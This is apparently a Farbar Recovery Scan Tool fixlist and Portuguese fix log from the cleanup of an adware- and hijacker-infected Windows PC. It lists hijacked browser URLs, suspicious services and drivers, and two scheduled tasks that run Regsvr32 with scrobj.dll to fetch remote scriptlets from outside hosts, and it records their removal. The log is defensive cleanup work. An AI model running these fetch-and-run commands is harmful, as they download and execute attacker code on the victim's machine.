ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\amd64\FileSyncShell64.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Users\Sil C San\AppData\Local\Microsoft\OneDrive\17.3.4604.0120\FileSyncShell.dll -> Nenhum Arquivo
BootExecute: autocheck autochk * sdnclean64.exe
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.yahoo.com/?fr=hp-avast&type=avastbcl
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://br.yahoo.com/?fr=hp-avast&type=avastbcl
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pt-br/?ocid=iehp
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eastness\Application\chrome.exe (Google Inc.) <==== ATEN��O
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
SearchScopes: HKLM-x32 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-4089044868-1957115196-969965961-1000 -> DefaultScope {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
SearchScopes: HKU\S-1-5-21-4089044868-1957115196-969965961-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A&q={searchTerms}
SearchScopes: HKU\S-1-5-21-4089044868-1957115196-969965961-1000 -> {9CB96984-43C3-4D44-90EF-01466EFCF7BB} URL = hxxps://br.search.yahoo.com/yhs/search?type=avastbcl&hspart=avast&hsimp=yhs-001&p={searchTerms}
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
CHR HomePage: Default -> hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
CHR StartupUrls: Default -> "hxxp://www.ourluckysites.com/?type=hp&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A"
StartMenuInternet: (HKLM) OperaStable - C:\Program Files (x86)\Opera\Launcher.exe hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [108208 2017-04-27] () <==== ATEN��O
R2 Kitty; C:\Users\Sil C San\AppData\Local\Kitty\Kitty.dll [553472 2017-04-25] (kitty) [Arquivo n�o assinado] <==== ATEN��O
R2 WinSAPSvc; C:\Users\Sil C San\AppData\Roaming\WinSAPSvc\WinSAP.dll [513536 2017-05-02] (win) [Arquivo n�o assinado] <==== ATEN��O
R1 legendasdrv; C:\Windows\System32\drivers\legendasdrv.sys [57584 2015-12-04] (GT)
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATEN��O
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Users\Todos os Usu�rios\Spybot - Search & Destroy
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-04-26 08:53 - 2017-04-26 08:53 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Users\Todos os Usu�rios\Spybot - Search & Destroy
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-04-26 08:53 - 2017-05-02 17:44 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-04-26 08:53 - 2017-04-26 08:53 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking
2017-04-17 13:10 - 2017-04-17 13:10 - 00000000 ____D C:\Users\Bel\AppData\Roaming\Elex-tech
2017-04-17 11:05 - 2017-04-25 19:58 - 00000000 ____D C:\Windows\system32\log
2017-04-17 11:05 - 2016-05-22 23:41 - 00055056 _____ (Elex do Brasil Participa��es Ltda) C:\Windows\system32\Drivers\iSafeKrnlBoot.sys
2017-04-17 11:05 - 2016-05-19 03:42 - 00052392 _____ (Elex do Brasil Participa��es Ltda) C:\Windows\system32\Drivers\iSafeNetFilter.sys
Task: {9487D528-8C9A-4171-ACA3-FDF7F8CC3A08} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {C6802DAA-72EA-4B92-A407-FC62C947F18C} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATEN��O
Task: {DDDCD278-6B8F-4C22-984E-34087ADEBE09} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1QRTY5RYM3NUNSMURQNkU4NkIdRjF8NWM2M8MyNWU4NF== scrobj.dll
Task: {FD4D8B39-5C13-4BA2-AD17-49BAD88CD798} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1QRTY5RYM3NUNSMURQNkU4NkIdRjF8NWM2M8MyNWU4NF== scrobj.dll
ShortcutWithArgument: C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
ShortcutWithArgument: C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
ShortcutWithArgument: C:\Users\Sil C San\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493756406&z=b3848ca1c3f8a0469020cb2g0z3t2cdm8w9q7zeeac&from=ypid&uid=395049983_1052498_BC2B9D5A
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:IncompleteStartProcessProtection.cnt [10]
AlternateDataStreams: C:\Program Files (x86)\GbPlugin:u6eBQrM0Z2K3FKLVBMG8dY3IkKT2rqFO+Sf68h8fDg== [32]
AlternateDataStreams: C:\Windows\System32:7B753593_Uni.gbp [2]
AlternateDataStreams: C:\Windows\system32\Drivers\gbpddfac64.sys:X5ZN8aGvT4 [1270]
AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [1198]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
AlternateDataStreams: C:\Users\Todos os Usu�rios\Reprise:wupeogjxlctlfudivq`qsp`28hfm [0]
CreateRestorePoint:
RemoveProxy:
EmptyTemp:
Hosts:
Reboot:
end
*****************
Processos fechados com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valor removido (a) com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7ec9f21f-7755-11e6-8282-bc5ff44714c2} => chave removido (a) com sucesso.
HKCR\CLSID\{7ec9f21f-7755-11e6-8282-bc5ff44714c2} => chave não encontrado (a).
HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\SpybotPostWindows10UpgradeReInstall => valor removido (a) com sucesso.
HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => chave removido (a) com sucesso.
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => chave removido (a) com sucesso.
HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => chave não encontrado (a).
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => chave removido (a) com sucesso.
HKCR\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => chave não encontrado (a).
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => chave removido (a) com sucesso.
HKCR\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => chave não encontrado (a).
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => chave removido (a) com sucesso.
HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => chave não encontrado (a).
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => chave removido (a) com sucesso.
HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => chave não encontrado (a).
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1 => chave removido (a) com sucesso.
HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => chave não encontrado (a).
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2 => chave removido (a) com sucesso.
HKCR\Wow6432Node\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} => chave não encontrado (a).
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3 => chave removido (a) com sucesso.
HKCR\Wow6432Node\CLSID\{A78ED123-AB77-406B-9962-2A5D9D2F7F30} => chave não encontrado (a).
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4 => chave removido (a) com sucesso.
HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => chave não encontrado (a).
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5 => chave removido (a) com sucesso.
HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => chave não encontrado (a).
HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => valor restaurado com sucesso
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => valor restaurado com sucesso
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => valor restaurado com sucesso
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => valor restaurado com sucesso
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => valor restaurado com sucesso
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valor restaurado com sucesso
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => valor restaurado com sucesso
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => valor restaurado com sucesso
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => valor restaurado com sucesso
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\Software\Microsoft\Internet Explorer\Main\\Start Page Redirect Cache => valor removido (a) com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000_Classes\ChromeHTML => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor restaurado com sucesso
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor restaurado com sucesso
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a).
HKCR\Wow6432Node\CLSID\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a).
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valor removido (a) com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKCR\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => chave não encontrado (a).
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a).
HKCR\CLSID\{9CB96984-43C3-4D44-90EF-01466EFCF7BB} => chave não encontrado (a).
HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command\\Default => valor restaurado com sucesso
Chrome HomePage => não encontrado (a).
Chrome StartupUrls => não encontrado (a).
HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\shell\open\command\\Default => valor restaurado com sucesso
FirefoxU => serviço não encontrado (a).
Kitty => serviço não encontrado (a).
WinSAPSvc => serviço não encontrado (a).
legendasdrv => Serviço finalizado com sucesso.
HKLM\System\CurrentControlSet\Services\legendasdrv => chave removido (a) com sucesso.
legendasdrv => serviço removido (a) com sucesso.
iSafeKrnlMon => serviço não encontrado (a).
HKLM\System\CurrentControlSet\Services\Synth3dVsc => chave removido (a) com sucesso.
Synth3dVsc => serviço removido (a) com sucesso.
HKLM\System\CurrentControlSet\Services\tsusbhub => chave removido (a) com sucesso.
tsusbhub => serviço removido (a) com sucesso.
HKLM\System\CurrentControlSet\Services\VGPU => chave removido (a) com sucesso.
VGPU => serviço removido (a) com sucesso.
"C:\Users\Todos os Usu�rios\Spybot - Search & Destroy" => não encontrado (a).
C:\ProgramData\Spybot - Search & Destroy => movido com sucesso
C:\Program Files (x86)\Spybot - Search & Destroy 2 => movido com sucesso
C:\Windows\System32\Tasks\Safer-Networking => movido com sucesso
"C:\Users\Todos os Usu�rios\Spybot - Search & Destroy" => não encontrado (a).
"C:\ProgramData\Spybot - Search & Destroy" => não encontrado (a).
"C:\Program Files (x86)\Spybot - Search & Destroy 2" => não encontrado (a).
"C:\Windows\System32\Tasks\Safer-Networking" => não encontrado (a).
"C:\Users\Bel\AppData\Roaming\Elex-tech" => não encontrado (a).
C:\Windows\system32\log => movido com sucesso
"C:\Windows\system32\Drivers\iSafeKrnlBoot.sys" => não encontrado (a).
"C:\Windows\system32\Drivers\iSafeNetFilter.sys" => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{9487D528-8C9A-4171-ACA3-FDF7F8CC3A08} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9487D528-8C9A-4171-ACA3-FDF7F8CC3A08} => chave removido (a) com sucesso.
C:\Windows\System32\Tasks\Adobe Acrobat Update Task => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Adobe Acrobat Update Task => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6802DAA-72EA-4B92-A407-FC62C947F18C} => chave não encontrado (a).
C:\Windows\System32\Tasks\Milimili => não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => chave não encontrado (a).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DDDCD278-6B8F-4C22-984E-34087ADEBE09} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DDDCD278-6B8F-4C22-984E-34087ADEBE09} => chave removido (a) com sucesso.
C:\Windows\System32\Tasks\PowerWord-SCT-JT => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PowerWord-SCT-JT => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FD4D8B39-5C13-4BA2-AD17-49BAD88CD798} => chave removido (a) com sucesso.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FD4D8B39-5C13-4BA2-AD17-49BAD88CD798} => chave removido (a) com sucesso.
C:\Windows\System32\Tasks\Windows-WoShiBeiYongDe => movido com sucesso
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-WoShiBeiYongDe => chave removido (a) com sucesso.
C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk => Atalho argumento removido (a) com sucesso..
C:\Users\Sil C San\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk => Atalho argumento removido (a) com sucesso..
C:\Users\Sil C San\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk => Atalho argumento removido (a) com sucesso..
C:\Program Files (x86)\GbPlugin => ":IncompleteStartProcessProtection.cnt" ADS removido (a) com sucesso..
C:\Program Files (x86)\GbPlugin => ":u6eBQrM0Z2K3FKLVBMG8dY3IkKT2rqFO+Sf68h8fDg==" ADS removido (a) com sucesso..
C:\Windows\System32 => ":7B753593_Uni.gbp" ADS removido (a) com sucesso..
C:\Windows\system32\Drivers\gbpddfac64.sys => ":X5ZN8aGvT4" ADS removido (a) com sucesso..
C:\Windows\system32\Drivers\wsddfac.sys => ":X5ZN8aGXs4" ADS removido (a) com sucesso..
C:\ProgramData\Reprise => ":wupeogjxlctlfudivq`qsp`28hfm" ADS removido (a) com sucesso..
"C:\Users\Todos os Usu�rios\Reprise" => ":wupeogjxlctlfudivq`qsp`28hfm" ADS não encontrado (a).
Ponto de Restauração criado com sucesso.
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso.
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valor removido (a) com sucesso.
HKU\S-1-5-21-4089044868-1957115196-969965961-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valor removido (a) com sucesso.
========= Fim de RemoveProxy: =========
C:\Windows\System32\Drivers\etc\hosts => movido com sucesso
Hosts restaurado com sucesso.
=========== EmptyTemp: ==========
BITS transfer queue => 12582912 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 21460453 B
Java, Flash, Steam htmlcache => 7461778 B
Windows/system/drivers => 2571811 B
Edge => 0 B
Chrome => 73808952 B
Firefox => 0 B
Opera => 1611488 B
Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 219196 B
systemprofile32 => 3754762 B
LocalService => 66228 B
NetworkService => 66228 B
Sil C San => 18752276 B
Bel => 20334892 B
RecycleBin => 4858432 B
EmptyTemp: => 159.8 MB de dados temporários Removidos.
================================
O sistema precisou ser reiniciado.
==== Fim de Fixlog 18:07:01 ====